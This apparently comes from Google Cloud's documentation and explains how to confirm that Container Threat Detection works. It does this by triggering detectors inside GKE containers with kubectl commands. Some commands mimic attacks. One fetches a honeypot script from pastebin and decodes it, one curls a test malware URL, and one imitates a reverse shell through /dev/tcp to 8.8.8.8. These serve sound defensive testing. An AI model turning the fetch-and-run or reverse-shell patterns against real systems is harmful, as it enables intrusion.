This page explains how to verify that Container Threat Detection is working by intentionally triggering detectors and checking for findings. Container Threat Detection is a built-in service for the Security Command Center Premium tier. To view Container Threat Detection findings, it must be enabled in Security Command Center Services settings.
Before you begin
To detect potential threats to your containers, you need to make sure that your clusters are on a supported version of Google Kubernetes Engine (GKE). For more information, see using a supported GKE version.
Set environment variables
To test detectors, you use the Google Cloud console and Cloud Shell. You can set environment variables in Cloud Shell to make it easier to run commands. The following variables are used to test all Container Threat Detection detectors.
Go to the Google Cloud console.
Select the project that contains the container you want to use to test.
Click Activate Cloud Shell.
In Cloud Shell, set environment variables.
The zone your cluster is in:
export ZONE=CLUSTER_ZONE
The project your container is in:
export PROJECT=PROJECT_ID
Your cluster name:
export CLUSTER_NAME=CLUSTER_NAME
The variables are set. The following sections include instructions for testing Container Threat Detection detectors.
Added Binary Executed
To trigger an Added Binary Executed finding, drop a binary in your container and
execute it. This example deploys the latest Ubuntu 18.04 image, copies /bin/ls
to another location, and then executes it. The binary's execution is unexpected
because the copy of the binary wasn't part of the original container image, even
when that image is on Ubuntu 18.04, and containers are meant to be immutable.
Use Cloud Shell to access the cluster control plane:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECT
Drop a binary and execute it:
tag="ktd-test-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run --restart=Never --rm=true -i \ --image marketplace.gcr.io/google/ubuntu1804:latest \ "$tag" -- bash -c "cp /bin/ls /tmp/$tag; /tmp/$tag"
This test procedure should create an Added Binary Executed finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate Security Command Center Premium tier.
For noise reduction, when you first create a container, Container Threat Detection
temporarily filters Added Binary Executed findings. To see all Added Binary
Executed findings while a container is being set up, prefix your container name
with ktd-test
, as in the example.
Added Library Loaded
To trigger an Added Library Loaded finding, drop a library in your container and
then load it. This example deploys the latest Ubuntu 18.04 image, copies
/lib/x86_64-linux-gnu/libc.so.6
to another location, and then loads it using
ld
. The loaded library is unexpected because the copy of the library was not
part of the original container image, even if that image is on Ubuntu 18.04, and
containers are meant to be immutable.
Use Cloud Shell to access the cluster control plan:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECT
Drop a library and use
ld
to load it:tag="ktd-test-library-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run --restart=Never --rm=true -i \ --image marketplace.gcr.io/google/ubuntu1804:latest \ "$tag" -- bash -c "cp /lib/x86_64-linux-gnu/libc.so.6 /tmp/$tag; /lib64/ld-linux-x86-64.so.2 /tmp/$tag"
This test procedure should create an Added Library Loaded finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate Security Command Center Premium tier at the organization level.
For noise reduction, when you first create a container, Container Threat Detection
temporarily filters Added Library Loaded findings. To see all Added Library
Loaded findings while a container is being set up, prefix your container name
with ktd-test
, as in the example.
Malicious Script Executed
To trigger a Malicious Script Executed finding, you can execute the script in the following procedure in your container.
The procedure deploys the latest Ubuntu 18.04 image, copies a script that appears malicious, and then executes it. To trigger a detection, a script must appear malicious to the detector.
The script originated from a honeypot, but the binary at the referenced URL was removed, so running the script won't cause malicious activity in your container. If you follow the URL, you receive a 404 message, which is expected.
Use Cloud Shell to access the cluster control plan:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECT
Execute a script in a new container:
tag="ktd-test-malicious-script-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run --restart=Never --rm=true -i \ --image marketplace.gcr.io/google/ubuntu1804:latest "$tag" \ -- bash -c "(curl -fsSL https://pastebin.com/raw/KGwfArMR||wget -q -O - https://pastebin.com/raw/KGwfArMR)| base64 -d"
This test procedure creates a Malicious Script Executed finding that you can view in Security Command Center and in Cloud Logging if you've configured logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate Security Command Center Premium tier at the organization level.
Malicious URL Observed
To trigger a Malicious URL Observed finding, execute a binary and provide a malicious URL as an argument.
The following example deploys an Ubuntu 18.04
image and executes /bin/curl
to access a sample malware URL from the
Safe Browsing
service.
Use Cloud Shell to access the cluster control plan:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECT
Execute
curl
and provide a malicious URL as an argument:tag="ktd-test-malicious-url-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" url="https://testsafebrowsing.appspot.com/s/malware.html" kubectl run --restart=Never --rm=true -i \ --image marketplace.gcr.io/google/ubuntu1804:latest \ "$tag" -- bash -c "curl $url | cat"
This test procedure triggers a Malicious URL Observed finding that you can view in Security Command Center and, if you have configured Logging for Container Threat Detection, in Cloud Logging. Viewing findings in Cloud Logging is only available if you activate Security Command Center Premium tier at the organization level.
Reverse Shell
To trigger a Reverse Shell finding, start a binary with stdin
redirection to a
TCP connected socket. This example starts /bin/echo
with redirection to the
Google public DNS
8.8.8.8
on the DNS port. Nothing is printed when you run this example. To
prevent any external code injection through a man-in-the-middle (MITM) attack,
this example doesn't use the /bin/bash binary
.
Use Cloud Shell to access the cluster control plan:
gcloud container clusters get-credentials $CLUSTER_NAME \ --zone $ZONE \ --project $PROJECT
Start a binary with
/bin/echo
redirection to the Google public DNS:tag="ktd-test-reverse-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)" kubectl run --restart=Never --rm=true -i \ --image marketplace.gcr.io/google/ubuntu1804:latest \ "$tag" -- bash -c "/bin/echo >& /dev/tcp/8.8.8.8/53 0>&1"
This test procedure creates a Reverse Shell finding you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate Security Command Center Premium tier at the organization level.
What's next
- Learn how to use Container Threat Detection.